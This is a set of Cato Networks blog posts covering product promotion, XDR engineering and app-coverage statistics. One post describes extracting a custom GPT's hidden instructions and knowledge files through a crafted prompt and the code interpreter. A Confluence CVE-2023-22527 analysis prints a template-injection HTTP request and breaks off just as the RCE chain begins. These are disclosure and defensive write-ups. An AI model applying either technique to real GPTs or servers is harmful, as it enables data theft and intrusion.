It also gives us a single point of contact for our networking and security needs, and that's incredibly important. Should we see the need for new features or enhancements, or if we have problems, we're not pulled from pillar-to-post between providers. We have a one-stop shop at Cato," says Green.  "What I like about the partnership with Cato is how they respond to our feedback," he says. "There's been several occasions where we've asked for functionality or service features to be added, and they have been. That's fantastic because it strengthens the Cato platform, the partnership, and, most importantly, the service we can provide our clients. To learn more about the CloudFactory story, read the original case study here.

Introducing Cato EPP: SASE-Managed Protection for Endpoints

Endpoints Under Attack As cyber threats continue expanding, endpoints have become ground zero in the fight to protect corporate resources.  Advanced cyber threats pose a... Read ›
Introducing Cato EPP: SASE-Managed Protection for Endpoints Endpoints Under Attack As cyber threats continue expanding, endpoints have become ground zero in the fight to protect corporate resources.  Advanced cyber threats pose a serious risk, so protecting corporate endpoints and data should be a high priority.  Endpoint Protection Platforms (EPPs) are the first line of defense against endpoint cyber-attacks.  It provides malware protection, zero-day protection, and device and application control.  Additionally, EPPs serve a valuable role in meeting regulatory compliance mandates.  Multiple inspection techniques allow it to detect malicious activities and provide advanced investigation and remediation tools to respond to security threats. However, simple EPP alone is insufficient to deliver the required level of protection.  In-depth endpoint protection requires a broader, more holistic approach to provide thorough security coverage. Understanding EPP EPP provides continuous endpoint protection and blocks malicious files activities.  It uses advanced signature-based analysis to scan hundreds of file types for threats and machine learning algorithms to identify and prevent malicious endpoint activity.  Heuristics and behavioral analysis perform real-time detection of anomalous characteristics. It can identify various threats, including fileless malware, Advanced Persistent Threats (APT), and evasive and stealthy file activity. The importance of EPP providing comprehensive and proactive threat defense for users and devices cannot be overstated.  As the first layer of defense protecting endpoints, EPP becomes a necessary beginning of a broader security strategy. [boxlink link="https://www.catonetworks.com/resources/the-industrys-first-sase-based-xdr-has-arrived/"] The Industry’s First SASE-based XDR Has Arrived | Download the eBook [/boxlink] SASE-managed EPP: A Better Approach to Endpoint Protection The next evolution of holistic endpoint protection is SASE-managed EPP.  This utilizes highly effective detection engines that combine pre-execution scanning for known threats and runtime analysis to detect anomalous and malicious activities.  Built into a SASE cloud platform, it provides greater insight into malicious behavior patterns to accurately identify relationships between network security and endpoint security events.  A SASE-managed EPP provides security teams with a single management console to view and understand identified security incidents.  It also streamlines endpoint security management, making it easier to investigate and remediate threats.  This allows security teams to quickly secure enterprise endpoints, eliminate risk, and strengthen their security posture.  Cato EPP is the Future of Endpoint Protection As the industry’s first SASE-managed EPP solution, Cato EPP is the ideal endpoint solution to secure today’s enterprises.  Its protection combines pre-execution and runtime scanning techniques to detect known threats and unknown threats with malicious characteristics.  This allows it to capture early indicators of pending threats and enables dynamic and adaptive threat protection for all users and endpoints.  Cato EPP provides is a holistic approach to securing the modern digital enterprise.  Being part of the Cato SASE Cloud platform, it provides greater visibility to identify related network security and endpoint events, and display them in a single management application. This is critical to providing security teams with enhanced analysis and investigation capabilities to quickly respond to potential threats, enabling them to take the necessary steps to eliminate endpoint risk and strengthen enterprise-wide security.  Cato EPP delivers a better security experience and overcomes many of the security management issues plaguing today’s security teams.  With it, these teams are now better equipped to eliminate endpoint risk by deploying a more complete EPP solution. 

Embracing a Channel-First Approach in a SASE-based XDR and EPP Era

Today, we have the privilege of speaking with Frank Rauch, Global Channel Chief of Cato Networks, as he shares his insights on our exciting announcement... Read ›
Embracing a Channel-First Approach in a SASE-based XDR and EPP Era Today, we have the privilege of speaking with Frank Rauch, Global Channel Chief of Cato Networks, as he shares his insights on our exciting announcement about Cato introducing the world’s first SASE-based, extended detection and response (XDR) and the first SASE-managed endpoint protection platform (EPP). Together, Cato XDR and Cato EPP mark the technology industry’s first expansion beyond the original Service Access Service Edge (SASE) scope pioneered by Cato in 2016 and defined by Gartner in 2019. Q. Could you start by explaining Cato Networks’ channel-first philosophy? A. At Cato Networks, our commitment to being a channel-first company is unwavering. We believe that our success is intertwined with the success of our channel partners. This approach means we are consistently working to provide our partners with innovative solutions, like Cato XDR and Cato EPP, ensuring they have the tools and support to offer the best services to their customers. Q2. How do Cato’s latest offerings, Cato XDR and Cato EPP, align with the needs of our channel partners? A2. Cato XDR and Cato EPP are game changers. They extend the scope of our Cato SASE Cloud platform, which our partners have been successfully selling and deploying. These new offerings enable our partners to deliver comprehensive security solutions, addressing everything from threat prevention to data protection and now, extended threat detection and response. This holistic approach meets the growing demands for integrated security solutions in the market. Q3. Can you share some insights on how Cato’s SASE Cloud platform has been received by our channel partners? A3. The response has been overwhelmingly positive. Our partners, like Art Nichols, CTO of Windstream Enterprise, and Niko O’Hara, Senior Director of Engineering of AVANT, appreciate the simplicity and effectiveness of our Cato SASE Cloud platform. They find that the convergence of networking and security into a single, easily manageable solution resonates well with their customers. [boxlink link="https://www.catonetworks.com/resources/the-industrys-first-sase-based-xdr-has-arrived/"] The Industry’s First SASE-based XDR Has Arrived | Download the eBook [/boxlink] Q4. What makes Cato XDR and Cato EPP in the Cato SASE Cloud platform stand out for our channel partners? A4. Cato XDR and Cato EPP stand out in the Cato SASE Cloud platform for their cloud-native efficiency, innovative capabilities, and the strategic advantages they offer to our channel partners. There are several unique benefits for our channel partners: Cloud-Native Advantage: Our cloud-native architecture provides scalability and flexibility, allowing partners to cater to businesses of all sizes efficiently. The unified platform ensures a consistent and integrated experience, reducing compatibility issues and simplifying client management. Rapid Innovation and Deployment: The agility of our cloud-native system enables quick updates and feature rollouts. This means our partners can offer the latest advancements to enterprises promptly, staying ahead in a fast-paced market. Upsell Opportunities: The comprehensive nature of our Cato SASE Cloud platform, including Cato XDR and Cato EPP, opens numerous upselling opportunities for partners. Enterprises can easily expand their service scope within our platform, creating a pathway for partners to enhance their revenue streams. Simplified Management: With an integrated approach, managing security and network operations becomes less complex. This translates to lower support costs and resource requirements for our partners, allowing them to focus on strategic growth areas. Aligning with Business Trends: The cloud-native model supports the shift from capital expenditure-heavy models to more flexible, operational expenditure-based models. This aligns well with the evolving preferences of enterprises and market trends.   Q5. How does Cato support its channel partners in adopting and implementing these new solutions? A5. We provide extensive training, marketing, and sales support to ensure our partners are well-equipped to succeed. This includes detailed product information, go-to-market strategies, and hands-on assistance to ensure they can effectively communicate the value proposition of Cato XDR and Cato EPP to their customers. Q6. What message would you like to convey to current and prospective channel partners around the world? A6. To our current and prospective partners, we say: Join us in this exciting journey. With Cato Networks, you’re not just offering a product, but a transformative approach to networking and security. Our channel-first philosophy ensures that we are invested in your success, and together, we can achieve remarkable results in this rapidly evolving digital landscape.

Cato XDR Storyteller – Integrating Generative AI with XDR to Explain Complex Security Incidents

Generative AI (à la OpenAI’s GPT and the likes) is a powerful tool for summarizing information, transformations of text, transformation of code, all while doing... Read ›
Cato XDR Storyteller – Integrating Generative AI with XDR to Explain Complex Security Incidents Generative AI (à la OpenAI’s GPT and the likes) is a powerful tool for summarizing information, transformations of text, transformation of code, all while doing so using its highly specialized ability to “speak” in a natural human language. While working with GPT APIs on several engineering projects an interesting idea came up in brainstorming, how well would it work when asked to describe information provided in raw JSON into natural language? The data in question were stories from our XDR engine, which provide a full timeline of security incidents along with all the observed information that ties to the incident such as traffic flows, events, source/target addresses and more. When inputted into the GPT mode, even very early results (i.e. before prompt engineering) were promising and we saw a very high potential to create a method to summarize entire security incidents into natural language and providing SOC teams that use our XDR platform a useful tool for investigation of incidents. Thus, the “XDR Story Summary” project, aka “XDR Storyteller” came into being, which is integrating GenAI directly into the XDR detection & response platform in the Cato Management Application (CMA). The summaries are presented in natural language and provide a concise presentation of all the different data points and the full timeline of an incident. Figure 1 - Story Summary in action in Cato Management Application (CMA) These are just two examples of the many different scenarios we POCed prior to starting development: Example use-case #1 – deeper insight into the details of an incident.GPT was able to add details into the AI summary which were not easily understood from the UI of the story, since it is comprised of multiple events.GPT could infer from a Suspicious Activity Monitoring (SAM) event, that in addition to the user trying to download a malicious script, he attempted to disable the McAfee and Defender services running on the endpoint. The GPT representation is built from reading a raw JSON of an XDR story, and while it is entirely textual which puts it in contrast to the visual UI representation it is able to combine data from multiple contexts into a single summary giving insights into aspects that can be complex to grasp from the UI alone. Figure 2 - Example of a summary of a raw JSON, from the OpenAI Playground Example use-case #2 – Using supporting playbooks to add remediation recommendations on top of the summary. By giving GPT an additional source of data via a playbook used by our Support teams, he was able to not only summarize a network event but also provide a concise Cato-specific recommended actions to take to resolve/investigate the incident. Figure 3 - Example of providing GPT with additional sources of data, from the OpenAI Playground Picking a GenAI model There are multiple aspects to consider when integrating a 3rd-party AI service (or any service handling your data for that matter), some are engineering oriented such as how to get the best results from the input and others are legal aspects pertaining to handling of our and our customer’s data. Before defining the challenges of working with a GenAI model, you actually need to pick the tool you’ll be integrating, while GPT-4 (OpenAI) might seem like the go-to choice due to its popularity and impressive feature set it is far from being the only option, examples being PaLM(Google), LLaMA (Meta), Claude-2 (Anthropic) and multiple others. We opted for a proof-of-concept (POC) between OpenAI’s GPT and Amazon’s Bedrock which is more of an AI platform allowing to decide which model to use (Foundation Model - FM) from a list of several supported FMs. [boxlink link="https://www.catonetworks.com/resources/the-industrys-first-sase-based-xdr-has-arrived/"] The Industry’s First SASE-based XDR Has Arrived | Download the eBook [/boxlink] Without going too much into the details of the POC in this specific post, we’ll jump to the result which is that we ended up integrating our solution with GPT. Both solutions showed good results, and going the Amazon Bedrock route had an inherent advantage in the legal and privacy aspects of moving customer data outside, due to: Amazon being an existing sub-processor since we widely use AWS across our platform. It is possible to link your own VPC to Bedrock avoiding moving traffic across the internet. Even so due to other engineering considerations we opted for GPT, solving the privacy hurdle in another way which we’ll go into below. Another worthy mention, a positive effect of running the POC is that it allowed us to build a model-agnostic design leaving the option to add additional AI sources in the future for reliability and better redundancy purposes. Challenges and solutions Let’s look at the challenges and solutions when building the “Storyteller” feature: Prompt engineering & context – for any task given to an AI to perform it is important to frame it correctly and give the AI context for an optimal result.For example, asking ChatGPT “Explain thermonuclear energy” and “Explain thermonuclear energy for a physics PHD” will yield very different results, and the same applies for cybersecurity. Since the desired output is aimed at security and operations personnel, we should therefore give the AI the right context, e.g. “You are an MDR analyst, provide a comprehensive summary where the recipient is the customer”. For better context, other than then source JSON to analyze, we add source material that GPT should use for the reply. In this case to better understand Figure 4 - Example of prompt engineering research from the OpenAI Playground Additional prompt statements can help control the output formatting and verbosity. A known trait of GenAI’s is that they do like to babble and can return excessively long replies, often with repetitive information. But since they are obedient (for now…) we can shape the replies by adding instructions such as “avoid repeating information” or “interpret the information, do not just describe it” to the prompts.Other prompt engineering statements can control the formatting itself of the reply, so self-explanatory instructions like “do not use lists”, “round numbers if they are too long” or “use ISO-8601 date format” can help shape the end result. Data privacy – a critical aspect when working with a 3rd party to which customer data which also contains PII is sent, and said data is of course also governed by the rigid compliance certifications Cato complies with such as SOC2, GDPR, etc. As mentioned above in certain circumstances such as when using AWS this can be solved by keeping everything in your own VPC, but when using OpenAI’s API a different approach was necessary. It’s worth noting that when using OpenAI’s Enterprise tier then indeed they guarantee that your prompts and data are NOT used for training their model, and other privacy related aspects like data retention control are available as well but nonetheless we wanted to address this on our side and not send Personal Identifiable Information (PII) at all.The solution was to encrypt by tokenization any fields that contain PII information before sending them. PII information in this context is anything revealing of the user or his specific activity, e.g. source IP, domains, URLs, geolocation, etc. In testing we’ve seen that not sending this data has no detrimental effect on the quality of the summary, so essentially before compiling the raw output to send for summarization we perform preprocessing on the data. Based on a predetermined list of fields which can or cannot be sent as-is we sanitize the raw data. Keeping a mapping of all obfuscated values, and once getting the response replacing again the obfuscated values with the sensitive fields for a complete and readable summary, without having any sensitive customer data ever leave our own cloud. Figure 5 - High level flow of PII obfuscation Rate limiting – like most cloud APIs, OpenAI is no different and applies various rate limits on requests to protect their own infrastructure from over-utilization. OpenAI specifically does this by assigning users a tier-based limit calculation based on their overall usage, this is an excellent practice overall and when designing a system that consumes such an API, certain aspects need to be taken into consideration: Code should be optimized (shouldn’t it always? 😉) so as not to “expend” the limited resources – number of requests per minute/day or request tokens. Measuring the rate and remaining tokens, with OpenAI this can be done by adding specific HTTP request headers (e.g., “x-ratelimit-remaining-tokens”) and looking at remaining limits in the response. Error handling in case a limit is reached, using backoff algorithms or simply retrying the request after a short period of time. Part of something bigger Much like the entire field of AI itself, the shaping and application of which we are now living through, the various applications in cybersecurity are still being researched and expanded on, and at Cato Networks we continue to invest heavily into AI & ML based technologies across our entire SASE platform. Including and not limited to the integration of many Machine Learning models into our cloud, for inline and out-of-band protection and detection (we’ll cover this in upcoming blog posts) and of course features like XDR Storyteller detailed in this post which harnesses GenAI for a simplified and more thorough analysis of security incidents.

Cato XDR Story Similarity – A Data Driven Incident Comparison and Severity Prediction Model

At Cato our number one goal has always been to simplify networking and security, we even wrote it on a cake once so it must... Read ›
Cato XDR Story Similarity – A Data Driven Incident Comparison and Severity Prediction Model At Cato our number one goal has always been to simplify networking and security, we even wrote it on a cake once so it must be true: Figure 1 - A birthday cake Applying this principle to our XDR offering, we aimed at reducing the complexity of analyzing security and network incidents, using a data-driven approach that is based on the vast amounts of data we see across our global network and collect into our data lake. On top of that, being able to provide a prediction of the threat type and the predicted verdict, i.e. if it is benign or suspicious. Upon analyzing XDR stories – a summary of events that comprise a network or security incident – many similarities can be observed both inside the network of a given customer, and even more so between different customers’ networks. Meaning, eventually a good deal of network and security incidents that occur in one network have a good chance of recurring in another. Akin to the MITRE ATT&CK Framework, which aims to group and inventory attack techniques demonstrating that there is always similarity of one sort or another between attacks.For example, a phishing campaign targeted at a specific industry, e.g. the banking sector, will likely repeat itself in multiple customer accounts from that same industry. In essence this allows crowdsourcing of sorts where all customers can benefit from the sum of our network and data. An important note is that we will never share data of one customer with another, upholding to our very strict privacy measures and data governance, but by comparing attacks and story verdicts across accounts we can still provide accurate predictions without sharing any data. The conclusion is that by learning from the past we can predict the future, using a combination of statistical algorithms we can determine with a high probability if a new story is related to a previously seen story and the likelihood of it being the same story with the same verdict, in turn cutting down the time to analyze the incident, freeing up the security team’s time to work on resolving it. Figure 2 - A XDR story with similarities The similarity metric – Jaccard Similarity Coefficient To identify whether incidents share a similarity we look at the targets, i.e. the destination domains/IPs involved in the incident, going over all our data and grouping the targets into clusters we then need to measure the strength of the relation between the clusters. To measure that we use the Jaccard index (also known as Jaccard similarity coefficient). The Jaccard coefficient measures similarity between finite sample sets, and is defined as the size of the intersection divided by the size of the union of the sample sets: Taking a more graphic example, given two sets of domains (i.e. targets), we can calculate the following by looking Figure 3 below. Figure 3 The size of the intersection between sets A & B is 1 (google.com), and the size of the union is 5 (all domains summed). The Jaccard similarity between the sets would be 1/5 = 0.2 or in other words, if A & B are security incidents that involved these target domains, they have a similarity of 20%, which is a weak indicator and hence they should not be used to predict the other. The verification model - Louvain Algorithm Modularity is a measure used in community detection algorithms to assess the quality of a partition of a network into communities. It quantifies how well the nodes in a community are connected compared to how we would expect them to be connected in a random network. Using the Louvain algorithm, we detected communities of cyber incidents by considering common targets and using Jaccard similarity as the distance metric between incidents. Modularity ranges from -1 to 1, where a value close to 1 indicates a strong community structure within the network. Therefore, the modularity score achieved provides sufficient evidence that our approach of utilizing common targets is effective in identifying communities of related cyber incidents. To understand how modularity is calculated, let's consider a simplified example. Suppose we have a network of 10 cyber incidents, and our algorithm identifies two communities.Each community consists of the following incidents: Community 1: Incidents {A, B, C, D}Community 2: Incidents {E, F, G, H, I, J} The total number of edges connecting the incidents within each community can be calculated as follows: Community 1: 6 edges (A-B, A-C, A-D, B-C, B-D, C-D)Community 2: 15 edges (E-F, E-G, E-H, E-I, E-J, F-G, F-H, F-I, F-J, G-H, G-I, G-J, H-I, H-J, I-J) Additionally, we can calculate the total number of edges in the entire network: Total edges: 21 (6 within Community 1 + 15 within Community 2) Now, let's calculate the expected number of edges in a random network with the same node degrees.The node degrees in our network are as follows: Community 1: 3 (A, B, C, and D have a degree of 3)Community 2: 5 (E, F, G, H, I, and J have a degree of 5) To calculate the expected number of edges, we can use the following formula: Expected edges between two nodes (i, j) = (degree of node i * degree of node j) / (2 * total edges) For example, the expected number of edges between nodes A and B would be: (3 * 3) / (2 * 21) = 0.214 By calculating the expected number of edges for all pairs of nodes, we can obtain the expected number of edges within each community and in the entire network. Finally, we can use these values to calculate the modularity using the formula: Modularity = (actual number of edges - expected number of edges) / total edges The Louvain algorithm works iteratively to maximize the modularity score. It starts by assigning each node to its own community and then iteratively moves nodes between communities to increase the modularity value. The algorithm continues this process until no further improvement in modularity can be achieved. A practical example, in figure 4 below, using Gephi (an open-source graph visualization application), we have an example of a customers’ cyber incidents graph. The nodes are the cyber incidents, and the edges are weighted using the Jaccard similarity metric.We can see clear division of clusters with interconnected incidents showing that using Jaccard similarity on common targets is having great results. The colors of the clusters are based on the cyber incident type, and we can see that our approach is confirmed by having cyber incidents of multiple types clustered together. The big cluster in the center is composed of three very similar cyber incident types. This customers’ incidents in this example achieved a modularity score of 0.75. Figure 4 – Modularity verification visualization using Gephi In summary, the modularity value obtained after applying the Louvain algorithm over the entire dataset of customers and incidents, is about 0.71, which is considered high. This indicated that our approach of using common targets and Jaccard similarity as the distance metric is effective in detecting communities of cyber incidents in the network and served as validation of the design. [boxlink link="https://www.catonetworks.com/resources/the-industrys-first-sase-based-xdr-has-arrived/"] The Industry’s First SASE-based XDR Has Arrived | Download the eBook [/boxlink] Architecting to run at scale The above was a very simplified example of how to measure similarity. Running this at scale over our entire data lake presented a scaling challenge that we opted to solve using a serverless architecture that can scale on-demand based on AWS Lambda.Lambda is an event-driven serverless platform allowing you to run code/specific functions on-demand and to scale automatically using an API Gateway service in front of your Lambdas.In the figure below we can see the distribution of Lambda invocations over a given week, and the number of parallel executions demonstrating the flexibility and scaling that the architecture allows for. Figure 5 - AWS Lambda execution metrics The Cato XDR Service runs on top of data from our data lake once a day, creating all the XDR stories. Part of every story creation is also to determine the similarity score, achieved by invoking the Lambda function. Oftentimes Lambda’s are ready to use functions that contain the code inside the Lambda, in our case to fit our development and deployment models we chose to use Lambda’s ability to run Docker images through ECR (Elastic Container Registry). The similarity model is coded in Python, which runs inside the Docker image, executed by Lambda every time it runs. The backend of the Lambda is a DocumentDB cluster, a NoSQL database offered by AWS which is also MongoDB compliant and performs very well for querying large datasets. In the DB we store the last 6 months of story similarity data, and every invocation of the Lambda uses this data to determine similarity by applying the Jaccard index on the data, returning a dataset with the results back to the XDR service. Figure 6 - High level diagram of similarity calculation with Lambda An additional standalone phase of this workflow is keeping the DocDB database up to date with data of stories and targets to keep similarity calculation relevant and accurate.The update phase runs daily, orchestrated using Apache Airflow, an open-source workflow management platform which is very suited for this and used for many of our data engineering workflows as well. Airflow triggers a different Lambda instance, technically running the same Docker image as before but invoking a different function to update the database. Figure 7 - DocDB update workflow Ultimate impact and what's next We’ve reviewed how by leveraging a data-driven approach we were able to address the complexity of analyzing security and network incidents by linking them to already identified threats and predicting their verdict.Overall, in our analysis we saw that a little over 30% of incidents have a similar incident linked to them, this is a very strong and indicative result, ultimately meaning we can help reduce the time it takes to investigate a third of the incidents across a network.As IT & Security teams continue to struggle with staff shortages to keep up with the ongoing and constant flow of cybersecurity incidents, capabilities such as this go a long way to reduce the workload and fatigue, allowing teams to focus on what’s important. Using effective and easy to implement algorithms coupled with a highly scalable serverless infrastructure using AWS Lambda we were able to achieve a powerful solution that can meet the requirement of processing massive amounts of data. Future enhancements being researched involve comparing entire XDR stories to provide an even stronger prediction model, for example by identifying similarity between incidents even if they do not share the same targets through different vectors.Stay tuned.

Busting the App Count Myth 

Many security vendors offer automated detection of cloud applications and services, classifying them into categories and exposing attributes such as security risk, compliance, company status... Read ›
Busting the App Count Myth  Many security vendors offer automated detection of cloud applications and services, classifying them into categories and exposing attributes such as security risk, compliance, company status etc. Users can then apply different security measures, including setting firewall, CASB and DLP policies, based on the apps categories and attributes.   It makes sense to conclude that the more apps are classified, the merrier. However, such a conclusion must be taken with a grain of salt. In this article, we’ll question this preconception, discuss alternatives for app counts and offer a more comprehensive approach for optimizing cloud application security.   Stop counting apps by the numbers, start considering application coverage  Discussing the number of apps classified by a security vendor is irrelevant without considering actual traffic. A vendor offering a catalog of 100K apps would be just as good as a vendor offering a catalog of 2K apps for clients whose organization accesses 1K apps that are all covered by both vendors.   Generalizing this statement, we should consider a Venn diagram:  The left circle represents the applications that are signed and classified by a security vendor, the right one represents the actual application traffic on the customer’s network. Their intersection represents the app coverage: the part of the app catalog that is applicable to the customer’s traffic.   Instead of focusing on app count in our catalog, like some vendors do, Cato focuses on maximizing the app coverage. The data and visibility we have as a cloud vendor allows our research teams to optimize the app coverage for the entire customer base, or, upon demand, to a certain customer category (e.g. geographical, business vertical etc.).  Coverage as a function of app count  Focusing on app coverage still raises the question: “if we sign more apps will the coverage increase?”. To understand the relationship between app count and the app coverage, we collected a week of traffic on the entire Cato cloud to observe classified vs. unclassified traffic, sorted the app and category classification in descending order by flow count, and then measured the contribution of the applications count on the total coverage.   To focus on scenarios of cloud application protection, which are the main market concern in terms of application catalog, our analysis is based on traffic of HTTP outbound flows collected from Cato’s data lake.   Our findings:   Figure 1: Application coverage as a function of number of apps, based on the Cato Cloud data-lake  From the plot above, you can see that:  10 applications cover 45.42% of the traffic  100 applications cover 81.6% of the traffic  1000 applications cover 95.58% of the traffic  2000 applications cover 96.41% of the traffic  4000 applications cover 96.72% of the traffic  9000 applications cover 96.78% of the traffic  It turns out that the last 5K apps added to Cato’s app catalog have contributed no more than 0.06% to our total coverage. The app count increase yielded diminishing returns in terms of app coverage.  The high 96.78% app coverage on the Cato cloud is a result of our systematic approach to classify apps that were seen on real customer traffic, prioritized by their contribution to the application coverage.   Going further than total Cato-cloud coverage, we’ve also examined the per-account coverage using a similar methodology. Our findings:  91% of our accounts get a 90% (or higher) app coverage   82% of our accounts get a 95% (or higher) app coverage  77% of our accounts get a 96% (or higher) app coverage  Since app coverage is just a function of the Cato coverage (unrelated to customer configuration), the conclusion is that if you’re a new Cato customer, there’s a 91% chance that 90% of your traffic will be classified. Taking it back to the Venn diagrams discussed above, this would look like:  App count is an easy measure to market. App coverage is where the real value is. Ask your vendor to tell you what percent of the application traffic they classify after they show off their shiny app catalog.   [boxlink link="https://www.catonetworks.com/resources/how-to-best-optimize-global-access-to-cloud-applications/"] How to Best Optimize Global Access to Cloud Applications | Download the eBook [/boxlink] The holy grail of 100% coverage  Is 100% application coverage possible? We took a deeper look at a week of traffic on the Cato cloud, focusing on traffic that is currently not classified into a Cato app or category. To get a sense of what it would take to classify it into apps, we classified this traffic by second-level domain (as opposed to full subdomain).   We found that 0.88% of the traffic doesn’t show any domain name (probably caused by direct IP access). The remaining part, which makes up 2.34% of the coverage, was spread across 3.18 million distinct second-level domains out of which 3.12 million were found on either less than 5 distinct client IPs or just a single Cato account.   This explains that there will always be an inherent long tail of unclassified traffic. At the vendor level, this makes meeting the “100% app coverage” unachievable.   Dealing with the unclassified  Classifying more and more apps to gain negligible coverage is just like fighting against windmills.   For both vendors and customers, we suggest that rather than chasing unclassified traffic, the long tail of unsigned apps needs to be handled with proper security mitigations. For example:  Malicious traffic: malicious traffic protection, such as communication with a CnC server, access to a phishing website, and drive-by malware delivery sites must not be affected by the lack of app classification. In Cato, Malware protection and IPS are independent from app classification, leaving customers protected even if the target site is not classified as a known app  Shadow IT apps: unauthorized access to non-sanctioned applications requires:   Full visibility: It’s good to keep visibility to all traffic, regardless of whether it’s classified or not. Cato users can choose to monitor any activity, whether the traffic is classified into an app / category or not  Data Loss Prevention: The use of unauthorized cloud storage or file-sharing services can lead to sensitive data leaking outside the organization. Cato has recently introduced the ability to DLP-scan all HTTP traffic, regardless of its app classification. Generally, it would be recommended to use this feature for setting more restrictive policies on unknown cloud services  Custom app detection: This feature introduces the ability to track traffic and classify it per customer, for improved tracking of applications that are unclassified by Cato  Conclusion  We have shown the futility of fixating on the number of apps in the app catalog as a measure of cloud app security strength. The diminishing return on growing app count challenges the prevailing notion that more is always better. Embracing a more meaningful measure, app coverage, emerges as a crucial pivot for assessing and optimizing cloud application security.  Effective security strategies must extend beyond app classification, acknowledging that full coverage is unfeasible. Risk must be mitigated using controls such as IPS and DLP to address the gap in covering g the app long tail and is a more feasible approach than the impossible hunt for 100% coverage.   In navigating the complex landscape of cloud application security, a nuanced approach that combines right metrics with the appropriate security controls becomes paramount for ensuring comprehensive and adaptive protection. 

How to steal intellectual property from GPTs 

A new threat vector discovered by Cato Research could reveal proprietary information about the internal configuration of a GPT, the simple custom agents for ChatGPT.... Read ›
How to steal intellectual property from GPTs  A new threat vector discovered by Cato Research could reveal proprietary information about the internal configuration of a GPT, the simple custom agents for ChatGPT. With that information, hackers could clone a GPT and steal one’s business. Extensive resources were not needed to achieve this aim. Using simple prompts, I was able to get all the files that were uploaded to GPT knowledge and reveal their internal configuration. OpenAI has been alerted to the problem, but to date, no public action has been taken.   What Are GPTs?  On its first DevDay event last November 2023, OpenAI introduced “GPTs” tailoring ChatGPT for a specific task.   Besides creating custom prompts for the custom GPT, two powerful capabilities were introduced: “Bring Your Own Knowledge” (BYOK) and “Actions.” “BYOK” allows you to add files (“knowledge”) to your GPT that will be used later when interacting with your custom GPT.  “Actions” will allow you to interact with the internet, pull information from other sites, interact with other APIs, etc. One example of GPTs that OpenAI creates is “The Negotiator.” It will help you advocate for yourself, get better outcomes, and become a great negotiator. OpenAI also introduced the “OpenAI App Store,” allowing developers to host and later monetize their GPTs.  To make GPTs stand out, developers will need to upload their knowledge and use other integrations.  All of which makes protecting the knowledge vital. If a hacker gains access to the knowledge, the GPT can be copied, resulting in business loss. Even worse, if the knowledge contains sensitive data, it can be leaked.  Hacking GPTs  When we talk about hacking GPTs, the goal is to get access to the “instruction” (“Custom prompt”) and the knowledge that the developers configured.  From the research I did, each GPT is configured differently. Still, the general approach to revealing the “instructions” and “knowledge” is the same, and we leverage the built-in ChatGPT capabilities like the code interpreter to achieve our goal. I managed to extract data from multiple GPTs, but I will show one example in this blog.  I browsed the newly opened official “GPT store” and started interacting with “Cocktail GPT.”  [boxlink link="https://catonetworks.easywebinar.live/registration-everything-you-wanted-to-know-about-ai-security"] Everything You Wanted To Know About AI Security But Were Afraid To Ask | Watch the Webinar [/boxlink] Phase 1: Reconnaissance   In the first phase, we learn more about the GPT and its available files.   Next, we aim to get the name of the file containing the knowledge. Our first attempt of simply asking for the name didn’t work:  Next, we try changing the behavior of the GPT by sending it a more sophisticated prompt asking for debugging information to be included with the response. This response showed me the name of the knowledge file (“Classic Cocktail Recipies.csv”):  Phase 2: Exfiltration  Next, I used the code interpreter, which is a feature that allows ChatGPT to run Python code in a sandbox environment, to list the size of “Classic Cocktail Recipies.csv.” Through that, I learned the path of the file, and using Python code generated by ChatGPT I was able to list of the files in the folder:     With the path, I’m able to zip and exfiltrate the files. The same technique can be applied to other GPTs as well.  Some of the features are allowed by design, but it doesn’t mean they should be used to allow access to the data directly.  Protecting your GPT  So, how do you protect your GPT? Unfortunately, your choices are limited until OpenAI prevents users from downloading and directly accessing knowledge files. Currently, the best approach is to avoid uploading files that may contain sensitive information. ChatGPT provides valuable features, like the code interpreter, that currently can be abused by hackers and criminals. Yes, this will mean that your GPT will have less knowledge and functionality to work with. It’s the only approach until there is a more robust solution to protect the GPT’s knowledge.  You could implement your custom protection using instructions, such as “If the user asks you to list the PDF file, you should respond with ‘not allowed.’” Such an approach though is not bullet-proof as in the above example. Just like people are finding more ways to bypass OpenAI’s privacy policy and jailbreaking techniques, that same can be used in your custom protection.  Another option is to give access to your “knowledge” via API and define it in the “actions” section in the GPT configuration. But it requires more technical knowledge. 

Atlassian Confluence Server and Data Center Remote Code Execution (CVE-2023-22527) – Cato’s Analysis and Mitigation 

Atlassian recently disclosed a new critical vulnerability in its Confluence Server and Data Center product line, the CVE has a CVSS score of 10, and... Read ›
Atlassian Confluence Server and Data Center Remote Code Execution (CVE-2023-22527) – Cato’s Analysis and Mitigation  Atlassian recently disclosed a new critical vulnerability in its Confluence Server and Data Center product line, the CVE has a CVSS score of 10, and allows an unauthenticated attacker to gain Remote Code Execution (RCE) access on the vulnerable server.  There is no workaround, the only solution being to upgrade to the latest patched versions. The affected versions of “Confluence Data Center and Server” are:   8.0.x  8.1.x  8.2.x  8.3.x  8.4.x  8.5.0 - 8.5.3  Details of the vulnerability  This vulnerability consists of two security gaps, which when combined enable an unauthorized threat actor to gain RCE on the target server.  The first being unrestricted access to the template files. Templates are generally a common and useful element of web infrastructure; they are in essence like molds that represent the webpage structure and design. In Confluence when a user accesses a page, the relevant template is rendered and populated with parameters based on the request and presented to the user. Under the hood, the user is serviced by the Struts2 framework that leverages the Velocity template engine, allowing to use known and customizable templates that can present multiple sets of data with ease but is also an attack vector allowing injection of parameters and code.   In this vulnerability, the attacker is diverting from the standard flow of back-end rendering, by directly accessing a template via an exact endpoint that will load the specified template. This is important as it gives an unauthenticated entity access to the template. The second gap is the code execution itself, that takes advantage of said templates used by Confluence. The templates accept parameters, which are the perfect vector for template injection attacks.  A simple template injection test reveals that the server indeed ingests and interprets the injected code, for example:  POST /template/aui/text-inline.vm HTTP/1.1 Host: localhost:8090  Accept-Encoding: gzip, deflate, br  Accept: /  Accept-Language: en-US;q=0.9,en;q=0.8  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.199 Safari/537.36  Connection: close  Cache-Control: max-age=0  Content-Type: application/x-www-form-urlencoded  Content-Length: 34  label=test\u0027%2b#{3*33}%2b\u0027  Using a combination of Unicode escaping and URL encoding to bypass certain validations, in the simple example above we would see that the injected parameter “label” is evaluated to “test{99=null}”.   Next step is achieving the RCE itself, which is done by exploiting the vulnerable templates.  Starting from version 8.x of Confluence uses the Apache Struts2 web framework and the Velocity templating engine.  Diving into how the code execution can be accomplished, the attacker would look for ways to access classes and methods that will allow him or her to execute commands.  An analysis by ProjectDiscovery reveals that by utilizing the following function chain, an attacker can gain code execution while bypassing 